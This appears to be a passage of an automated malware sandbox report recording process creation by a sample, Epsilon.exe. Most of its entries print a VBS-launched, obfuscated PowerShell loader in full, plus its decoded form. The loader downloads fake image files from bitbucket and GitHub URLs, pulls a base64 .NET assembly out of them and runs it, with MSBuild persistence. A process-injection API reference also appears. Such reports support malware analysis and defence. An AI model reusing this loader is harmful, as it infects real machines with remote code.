        Source: 7.2.powershell.exe.1a1da5d0000.0.raw.unpack, Progrgdfam3.csReference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num5, payload, bufferSize, ref bytesRead)
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\677174b841ee7.vbs" Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$DJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.hckSkpo/sdaolnwod/rwqewqfqwf/qretretr/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -execJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$dosigo = 'wwbo$gu$d$$u$fm$zqby$hy$aqbj$gu$u$bv$gk$bgb0$e0$yqbu$ge$zwbl$hi$xq$6$do$uwbl$gm$dqby$gk$d$b5$f$$cgbv$hq$bwbj$g8$b$$g$d0$i$bb$e4$zqb0$c4$uwbl$gm$dqby$gk$d$b5$f$$cgbv$hq$bwbj$g8$b$bu$hk$c$bl$f0$og$6$fq$b$bz$de$mg$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$zgb1$g4$ywb0$gk$bwbu$c$$r$bv$hc$bgbs$g8$yqbk$eq$yqb0$ge$rgby$g8$bqbm$gk$bgbr$hm$i$b7$c$$c$bh$hi$yqbt$c$$k$bb$hm$d$by$gk$bgbn$fs$xqbd$cq$b$bp$g4$awbz$ck$i$$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$j$b3$gu$ygbd$gw$aqbl$g4$d$$g$d0$i$bo$gu$dw$t$e8$ygbq$gu$ywb0$c$$uwb5$hm$d$bl$g0$lgbo$gu$d$$u$fc$zqbi$em$b$bp$gu$bgb0$ds$i$$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$j$bz$gg$dqbm$gy$b$bl$gq$t$bp$g4$awbz$c$$pq$g$ec$zqb0$c0$ugbh$g4$z$bv$g0$i$$t$ek$bgbw$hu$d$bp$gi$agbl$gm$d$$g$cq$b$bp$g4$awbz$c$$lqbd$g8$dqbu$hq$i$$k$gw$aqbu$gs$cw$u$ew$zqbu$gc$d$bo$ds$i$$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$zgbv$hi$zqbh$gm$a$$g$cg$j$bs$gk$bgbr$c$$aqbu$c$$j$bz$gg$dqbm$gy$b$bl$gq$t$bp$g4$awbz$ck$i$b7$c$$d$by$hk$i$b7$c$$cgbl$hq$dqby$g4$i$$k$hc$zqbi$em$b$bp$gu$bgb0$c4$r$bv$hc$bgbs$g8$yqbk$eq$yqb0$ge$k$$k$gw$aqbu$gs$kq$g$h0$i$bj$ge$d$bj$gg$i$b7$c$$ywbv$g4$d$bp$g4$dqbl$c$$fq$g$h0$ow$g$$0$cg$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$by$gu$d$b1$hi$bg$g$cq$bgb1$gw$b$$g$h0$ow$g$$0$cg$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$$k$gw$aqbu$gs$cw$g$d0$i$b$$cg$jwbo$hq$d$bw$hm$og$v$c8$ygbp$hq$ygb1$gm$awbl$hq$lgbv$hi$zw$v$go$a$bn$gy$a$bo$gs$agbl$gu$z$bl$gy$z$bm$c8$bqbu$gi$dgbn$go$z$bn$c8$z$bv$hc$bgbs$g8$yqbk$hm$lwb0$gu$cwb0$c4$agbw$gc$pw$1$dm$nw$2$de$mq$n$cw$i$$n$gg$d$b0$h$$cw$6$c8$lwby$ge$dw$u$gc$aqb0$gg$dqbi$hu$cwbl$hi$ywbv$g4$d$bl$g4$d$$u$gm$bwbt$c8$zwbt$gu$z$b1$hm$yq$x$dm$nq$v$g4$yqbu$g8$lwby$gu$zgbz$c8$a$bl$ge$z$bz$c8$bqbh$gk$bg$v$g4$zqb3$f8$aqbt$gc$mq$y$dm$lgbq$h$$zw$n$ck$ow$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$$k$gk$bqbh$gc$zqbc$hk$d$bl$hm$i$$9$c$$r$bv$hc$bgbs$g8$yqbk$eq$yqb0$ge$rgby$g8$bqbm$gk$bgbr$hm$i$$k$gw$aqbu$gs$cw$7$$0$cg$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$gk$zg$g$cg$j$bp$g0$yqbn$gu$qgb5$hq$zqbz$c$$lqbu$gu$i$$k$g4$dqbs$gw$kq$g$hs$i$$k$gk$bqbh$gc$zqbu$gu$e$b0$c$$pq$g$fs$uwb5$hm$d$bl$g0$lgbu$gu$e$b0$c4$rqbu$gm$bwbk$gk$bgbn$f0$og$6$fu$v$bg$dg$lgbh$gu$d$bt$hq$cgbp$g4$zw$o$cq$aqbt$ge$zwbl$ei$eqb0$gu$cw$p$ds$dq$k$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$j$bz$hq$yqby$hq$rgbs$ge$zw$g$d0$i$$n$dw$p$bc$ee$uwbf$dy$n$bf$fm$v$bb$fi$v$$+$d4$jw$7$c$$j$bl$g4$z$bg$gw$yqbn$c$$pq$g$cc$p$$8$ei$qqbt$eu$ng$0$f8$rqbo$eq$pg$+$cc$ow$g$cq$cwb0$ge$cgb0$ek$bgbk$gu$e$$g$d0$i$$k$gk$bqbh$gc$zqbu$gu$e$b0$c4$sqbu$gq$zqb4$e8$zg$o$cq$cwb0$ge$cgb0$ey$b$bh$gc$kq$7$c$$dq$k$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$cq$zqbu$gq$sqbu$gq$zqb4$c$$pq$g$cq$aqbt$ge$zwbl$fq$zqb4$hq$lgbj$g4$z$bl$hg$twbm$cg$j$bl$g4$z$bg$gw$yqbn$ck$ow$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$bp$gy$i$$o$cq$cwb0$ge$cgb0$ek$bgbk$gu$e$$g$c0$zwbl$c$$m$$g$c0$yqbu$gq$i$$k$gu$bgbk$ek$bgbk$gu$e$$g$c0$zwb0$c$$j$bz$hq$yqby$hq$sqbu$gq$zqb4$ck$i$b7$c$$j$bz$hq$yqby$hq$sqbu$gq$zqb4$c$$kw$9$c$$j$bz$hq$yqby$hq$rgbs$ge$zw$u$ew$zqbu$gc$d$bo$d
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $encodedtext =[convert]::tobase64string($bytes); $commandbytes = [system.convert]::frombase64string($base64command); $text = $encodedtext; $loadedassembly = [system.reflection.assembly]::load($commandbytes); $encodedtext =[convert]::tobase64string($bytes); $compressedbytearray = get-compressedbytearray -bytearray $enctext $type = $loadedassembly.gettype('testpowershell.hoaaaaaasdme'); $encodedtext =[convert]::tobase64string($bytes); $method = $type.getmethod('lfsgeddddddda').invoke($null, [object[]] (' txt.hckskpo/sdaolnwod/rwqewqfqwf/qretretr/gro.tekcubtib', '0', 'startupname', 'msbuild', '0'))}}" .exe -windowstyle hidden -exec
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$dosigo = 'wwbo$gu$d$$u$fm$zqby$hy$aqbj$gu$u$bv$gk$bgb0$e0$yqbu$ge$zwbl$hi$xq$6$do$uwbl$gm$dqby$gk$d$b5$f$$cgbv$hq$bwbj$g8$b$$g$d0$i$bb$e4$zqb0$c4$uwbl$gm$dqby$gk$d$b5$f$$cgbv$hq$bwbj$g8$b$bu$hk$c$bl$f0$og$6$fq$b$bz$de$mg$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$zgb1$g4$ywb0$gk$bwbu$c$$r$bv$hc$bgbs$g8$yqbk$eq$yqb0$ge$rgby$g8$bqbm$gk$bgbr$hm$i$b7$c$$c$bh$hi$yqbt$c$$k$bb$hm$d$by$gk$bgbn$fs$xqbd$cq$b$bp$g4$awbz$ck$i$$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$j$b3$gu$ygbd$gw$aqbl$g4$d$$g$d0$i$bo$gu$dw$t$e8$ygbq$gu$ywb0$c$$uwb5$hm$d$bl$g0$lgbo$gu$d$$u$fc$zqbi$em$b$bp$gu$bgb0$ds$i$$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$j$bz$gg$dqbm$gy$b$bl$gq$t$bp$g4$awbz$c$$pq$g$ec$zqb0$c0$ugbh$g4$z$bv$g0$i$$t$ek$bgbw$hu$d$bp$gi$agbl$gm$d$$g$cq$b$bp$g4$awbz$c$$lqbd$g8$dqbu$hq$i$$k$gw$aqbu$gs$cw$u$ew$zqbu$gc$d$bo$ds$i$$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$zgbv$hi$zqbh$gm$a$$g$cg$j$bs$gk$bgbr$c$$aqbu$c$$j$bz$gg$dqbm$gy$b$bl$gq$t$bp$g4$awbz$ck$i$b7$c$$d$by$hk$i$b7$c$$cgbl$hq$dqby$g4$i$$k$hc$zqbi$em$b$bp$gu$bgb0$c4$r$bv$hc$bgbs$g8$yqbk$eq$yqb0$ge$k$$k$gw$aqbu$gs$kq$g$h0$i$bj$ge$d$bj$gg$i$b7$c$$ywbv$g4$d$bp$g4$dqbl$c$$fq$g$h0$ow$g$$0$cg$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$by$gu$d$b1$hi$bg$g$cq$bgb1$gw$b$$g$h0$ow$g$$0$cg$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$$k$gw$aqbu$gs$cw$g$d0$i$b$$cg$jwbo$hq$d$bw$hm$og$v$c8$ygbp$hq$ygb1$gm$awbl$hq$lgbv$hi$zw$v$go$a$bn$gy$a$bo$gs$agbl$gu$z$bl$gy$z$bm$c8$bqbu$gi$dgbn$go$z$bn$c8$z$bv$hc$bgbs$g8$yqbk$hm$lwb0$gu$cwb0$c4$agbw$gc$pw$1$dm$nw$2$de$mq$n$cw$i$$n$gg$d$b0$h$$cw$6$c8$lwby$ge$dw$u$gc$aqb0$gg$dqbi$hu$cwbl$hi$ywbv$g4$d$bl$g4$d$$u$gm$bwbt$c8$zwbt$gu$z$b1$hm$yq$x$dm$nq$v$g4$yqbu$g8$lwby$gu$zgbz$c8$a$bl$ge$z$bz$c8$bqbh$gk$bg$v$g4$zqb3$f8$aqbt$gc$mq$y$dm$lgbq$h$$zw$n$ck$ow$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$$k$gk$bqbh$gc$zqbc$hk$d$bl$hm$i$$9$c$$r$bv$hc$bgbs$g8$yqbk$eq$yqb0$ge$rgby$g8$bqbm$gk$bgbr$hm$i$$k$gw$aqbu$gs$cw$7$$0$cg$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$gk$zg$g$cg$j$bp$g0$yqbn$gu$qgb5$hq$zqbz$c$$lqbu$gu$i$$k$g4$dqbs$gw$kq$g$hs$i$$k$gk$bqbh$gc$zqbu$gu$e$b0$c$$pq$g$fs$uwb5$hm$d$bl$g0$lgbu$gu$e$b0$c4$rqbu$gm$bwbk$gk$bgbn$f0$og$6$fu$v$bg$dg$lgbh$gu$d$bt$hq$cgbp$g4$zw$o$cq$aqbt$ge$zwbl$ei$eqb0$gu$cw$p$ds$dq$k$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$j$bz$hq$yqby$hq$rgbs$ge$zw$g$d0$i$$n$dw$p$bc$ee$uwbf$dy$n$bf$fm$v$bb$fi$v$$+$d4$jw$7$c$$j$bl$g4$z$bg$gw$yqbn$c$$pq$g$cc$p$$8$ei$qqbt$eu$ng$0$f8$rqbo$eq$pg$+$cc$ow$g$cq$cwb0$ge$cgb0$ek$bgbk$gu$e$$g$d0$i$$k$gk$bqbh$gc$zqbu$gu$e$b0$c4$sqbu$gq$zqb4$e8$zg$o$cq$cwb0$ge$cgb0$ey$b$bh$gc$kq$7$c$$dq$k$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$cq$zqbu$gq$sqbu$gq$zqb4$c$$pq$g$cq$aqbt$ge$zwbl$fq$zqb4$hq$lgbj$g4$z$bl$hg$twbm$cg$j$bl$g4$z$bg$gw$yqbn$ck$ow$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$bp$gy$i$$o$cq$cwb0$ge$cgb0$ek$bgbk$gu$e$$g$c0$zwbl$c$$m$$g$c0$yqbu$gq$i$$k$gu$bgbk$ek$bgbk$gu$e$$g$c0$zwb0$c$$j$bz$hq$yqby$hq$sqbu$gq$zqb4$ck$i$b7$c$$j$bz$hq$yqby$hq$sqbu$gq$zqb4$c$$kw$9$c$$j$bz$hq$yqby$hq$rgbs$ge$zw$u$ew$zqbu$gc$d$bo$dJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $encodedtext =[convert]::tobase64string($bytes); $commandbytes = [system.convert]::frombase64string($base64command); $text = $encodedtext; $loadedassembly = [system.reflection.assembly]::load($commandbytes); $encodedtext =[convert]::tobase64string($bytes); $compressedbytearray = get-compressedbytearray -bytearray $enctext $type = $loadedassembly.gettype('testpowershell.hoaaaaaasdme'); $encodedtext =[convert]::tobase64string($bytes); $method = $type.getmethod('lfsgeddddddda').invoke($null, [object[]] (' txt.hckskpo/sdaolnwod/rwqewqfqwf/qretretr/gro.tekcubtib', '0', 'startupname', 'msbuild', '0'))}}" .exe -windowstyle hidden -execJump to behavior
        Source: C:\Users\user\Desktop\Epsilon.exeCode function: 0_2_00007FF7378211CC LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary,0_2_00007FF7378211CC
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
